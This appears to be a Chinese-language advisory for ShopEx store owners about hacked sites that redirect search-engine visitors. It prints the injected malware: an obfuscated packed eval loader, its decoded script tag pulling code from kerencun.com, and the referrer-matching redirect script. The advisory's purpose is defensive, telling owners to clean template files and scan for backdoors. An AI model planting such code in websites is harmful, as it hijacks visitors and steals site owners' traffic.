百度等搜索引擎打开网站跳转其他网站，请各shopex网站注意防范检查！

最近收到很多ShopEx网站店主朋友的求助，主要现象如下：

在百度或360等搜索引擎上面，搜索自己网站的相关关键词，找到自己的网站，点击后马上会跳转到其他网站去了（无论哪个关键词搜索结果里面点击都是这样子）但是直接输入自己的的网址就不会跳转。

经本站分析，这是由于网站被黑客植入了恶意代码所致。用来偷走你的网站流量的，把本应该跳转到你网站的内容，恶意跳转到别人家的网站去了。这可能就是黑客用来赚钱的一种方法吧。

本站截取的一段恶意代码如下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5("<0 3=\\"1://6/a.b\\" 9=\\"7/8\\"></0>");',12,12,'script|http|kerencun|src|document|writeln|com|text|javascript|type|fzpf|js'.split('|'),0,{}))

还原后的原始代码如下：

document.writeln("<script src=\"http://kerencun.com/fzpf.js\" type=\"text/javascript\"></script>");

打开这个js文件，就知道是什么东东了：

var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|360|so|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}\//ig;

var where =document.referrer;

if(regexp.test(where))

{

document.write('<a target="_self" id="go" href="http://kerencun.com/fzpf.html">.</a>');go.click();

}

也就是说，如果是从搜索引擎进到您的网站的话，都会被跳转到另外的一个网站去了。

恶意代码一般是被加在了您网站的公共js文件或是头尾模板文件里面，请大家注意排查。

因此，本站提醒广大ShopEx的店主，请尽快检查好自己的网站，做好安全防护，保障自己网站的安全正常运行。

再次提醒广大站长朋友，如果您网站出现类似问题，请一定不要只是清除一下了事，既然人家能往你网站加恶意代码，就表示人家可以任意的对你网站的文件进行修改，一定是在您的网站留了后门。

请中标的朋友，及时扫描网站中是否有后门木马程序，

http://bbs.myshopex.com/thread-34-1-1.html

并对网站及时做好安全防护措施。

http://www.myshopex.com/view/2012/1005/265.html

(责任编辑：admin)